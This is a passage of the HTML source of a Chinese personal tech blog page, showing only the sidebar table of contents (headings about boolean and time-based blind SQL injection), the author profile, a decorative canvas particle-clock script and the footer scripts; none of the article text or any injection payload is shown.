class="nav-number">3.3.</span> <span class="nav-text">布尔盲注过程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#判断数据库个数"><span class="nav-number">3.3.1.</span> <span class="nav-text">判断数据库个数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断第一个数据库名的字符长度"><span class="nav-number">3.3.2.</span> <span class="nav-text">判断第一个数据库名的字符长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断第一个库的第一个字符"><span class="nav-number">3.3.3.</span> <span class="nav-text">判断第一个库的第一个字符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断第一个库的第二个字符"><span class="nav-number">3.3.4.</span> <span class="nav-text">判断第一个库的第二个字符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#依次找出剩下内容···"><span class="nav-number">3.3.5.</span> <span class="nav-text">依次找出剩下内容···</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#时间盲注"><span class="nav-number">4.</span> <span class="nav-text">时间盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#前提-2"><span class="nav-number">4.1.</span> <span class="nav-text">前提</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#if-函数"><span class="nav-number">4.2.</span> <span class="nav-text">if()函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#注入过程-1"><span class="nav-number">4.3.</span> <span class="nav-text">注入过程</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="W7"
      src="/images/head.jpg">
  <p class="site-author-name" itemprop="name">W7</p>
  <div class="site-description" itemprop="description">知识是一种乐趣，好奇是知识的萌芽</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">24</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/wemaxel" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;wemaxel" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:i@wqian.top" title="E-Mail → mailto:i@wqian.top" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/u/5529099160?is_all=1" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;u&#x2F;5529099160?is_all&#x3D;1" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="/images/weichat.jpg" title="WeChat → &#x2F;images&#x2F;weichat.jpg"><i class="fa fa-fw fa-weixin"></i></a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
      <div style="">
  <canvas id="canvas" style="width:60%;">当前浏览器不支持canvas，请更换浏览器后再试</canvas>
</div>
<script>
(function(){

   var digit=
    [
        [
            [0,0,1,1,1,0,0],
            [0,1,1,0,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,0,1,1,0],
            [0,0,1,1,1,0,0]
        ],//0
        [
            [0,0,0,1,1,0,0],
            [0,1,1,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [1,1,1,1,1,1,1]
        ],//1
        [
            [0,1,1,1,1,1,0],
            [1,1,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,0,0],
            [0,0,1,1,0,0,0],
            [0,1,1,0,0,0,0],
            [1,1,0,0,0,0,0],
            [1,1,0,0,0,1,1],
            [1,1,1,1,1,1,1]
        ],//2
        [
            [1,1,1,1,1,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,0,0,1,1,0],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0]
        ],//3
        [
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,1,0],
            [0,0,1,1,1,1,0],
            [0,1,1,0,1,1,0],
            [1,1,0,0,1,1,0],
            [1,1,1,1,1,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,0,1,1,0],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,1,1]
        ],//4
        [
            [1,1,1,1,1,1,1],
            [1,1,0,0,0,0,0],
            [1,1,0,0,0,0,0],
            [1,1,1,1,1,1,0],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0]
        ],//5
        [
            [0,0,0,0,1,1,0],
            [0,0,1,1,0,0,0],
            [0,1,1,0,0,0,0],
            [1,1,0,0,0,0,0],
            [1,1,0,1,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0]
        ],//6
        [
            [1,1,1,1,1,1,1],
            [1,1,0,0,0,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,0,0],
            [0,0,0,1,1,0,0],
            [0,0,1,1,0,0,0],
            [0,0,1,1,0,0,0],
            [0,0,1,1,0,0,0],
            [0,0,1,1,0,0,0]
        ],//7
        [
            [0,1,1,1,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,1,1,0]
        ],//8
        [
            [0,1,1,1,1,1,0],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [1,1,0,0,0,1,1],
            [0,1,1,1,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,0,1,1],
            [0,0,0,0,1,1,0],
            [0,0,0,1,1,0,0],
            [0,1,1,0,0,0,0]
        ],//9
        [
            [0,0,0,0,0,0,0],
            [0,0,1,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,0,0,0,0,0],
            [0,0,0,0,0,0,0],
            [0,0,1,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,1,1,1,0,0],
            [0,0,0,0,0,0,0]
        ]//:
    ];

var canvas = document.getElementById('canvas');

if(canvas.getContext){
    var cxt = canvas.getContext('2d');
    //声明canvas的宽高
    var H = 100,W = 700;
    canvas.height = H;
    canvas.width = W;
    cxt.fillStyle = '#f00';
    cxt.fillRect(10,10,50,50);

    //存储时间数据
    var data = [];
    //存储运动的小球
    var balls = [];
    //设置粒子半径
    var R = canvas.height/20-1;
    (function(){
        var temp = /(\d)(\d):(\d)(\d):(\d)(\d)/.exec(new Date());
        //存储时间数字，由十位小时、个位小时、冒号、十位分钟、个位分钟、冒号、十位秒钟、个位秒钟这7个数字组成
        data.push(temp[1],temp[2],10,temp[3],temp[4],10,temp[5],temp[6]);
    })();

    /*生成点阵数字*/
    function renderDigit(index,num){
        for(var i = 0; i < digit[num].length; i++){
            for(var j = 0; j < digit[num][i].length; j++){
                if(digit[num][i][j] == 1){
                    cxt.beginPath();
                    cxt.arc(14*(R+2)*index + j*2*(R+1)+(R+1),i*2*(R+1)+(R+1),R,0,2*Math.PI);
                    cxt.closePath();
                    cxt.fill();
                }
            }
        }
    }

    /*更新时钟*/
    function updateDigitTime(){
        var changeNumArray = [];
        var temp = /(\d)(\d):(\d)(\d):(\d)(\d)/.exec(new Date());
        var NewData = [];
        NewData.push(temp[1],temp[2],10,temp[3],temp[4],10,temp[5],temp[6]);
        for(var i = data.length-1; i >=0 ; i--){
            //时间发生变化
            if(NewData[i] !== data[i]){
                //将变化的数字值和在data数组中的索引存储在changeNumArray数组中
                changeNumArray.push(i+'_'+(Number(data[i])+1)%10);
            }
        }
        //增加小球
        for(var i = 0; i< changeNumArray.length; i++){
            addBalls.apply(this,changeNumArray[i].split('_'));
        }
        data = NewData.concat();
    }

    /*更新小球状态*/
    function updateBalls(){
        for(var i = 0; i < balls.length; i++){
            balls[i].stepY += balls[i].disY;
            balls[i].x += balls[i].stepX;
            balls[i].y += balls[i].stepY;
            if(balls[i].x > W + R || balls[i].y > H + R){
                balls.splice(i,1);
                i--;
            }
        }
    }

    /*增加要运动的小球*/
    function addBalls(index,num){
        var numArray = [1,2,3];
        var colorArray =  ["#3BE","#09C","#A6C","#93C","#9C0","#690","#FB3","#F80","#F44","#C00"];
        for(var i = 0; i < digit[num].length; i++){
            for(var j = 0; j < digit[num][i].length; j++){
                if(digit[num][i][j] == 1){
                    var ball = {
                        x:14*(R+2)*index + j*2*(R+1)+(R+1),
                        y:i*2*(R+1)+(R+1),
                        stepX:Math.floor(Math.random() * 4 -2),
                        stepY:-2*numArray[Math.floor(Math.random()*numArray.length)],
                        color:colorArray[Math.floor(Math.random()*colorArray.length)],
                        disY:1
                    };
                    balls.push(ball);
                }
            }
        }
    }

    /*渲染*/
    function render(){
        //重置画布宽度，达到清空画布的效果
        canvas.height = 100;
        //渲染时钟
        for(var i = 0; i < data.length; i++){
            renderDigit(i,data[i]);
        }
        //渲染小球
        for(var i = 0; i < balls.length; i++){
            cxt.beginPath();
            cxt.arc(balls[i].x,balls[i].y,R,0,2*Math.PI);
            cxt.fillStyle = balls[i].color;
            cxt.closePath();
            cxt.fill();
        }
    }

    clearInterval(oTimer);
    var oTimer = setInterval(function(){
        //更新时钟
        updateDigitTime();
        //更新小球状态
        updateBalls();
        //渲染
        render();
    },50);
}

})();
</script>
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>



      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
<span class="with-love" id="animate" style="font-size: 13px">
  <i class="fa fa-heart"></i>
</span>
  <span class="author" itemprop="copyrightHolder">W7</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


  <!-- 页面点击心形 -->
<script type="text/javascript" src="/js/clicklove.js"></script>
<script src="/live2d-widget/autoload.js"></script>
</body>
</html>

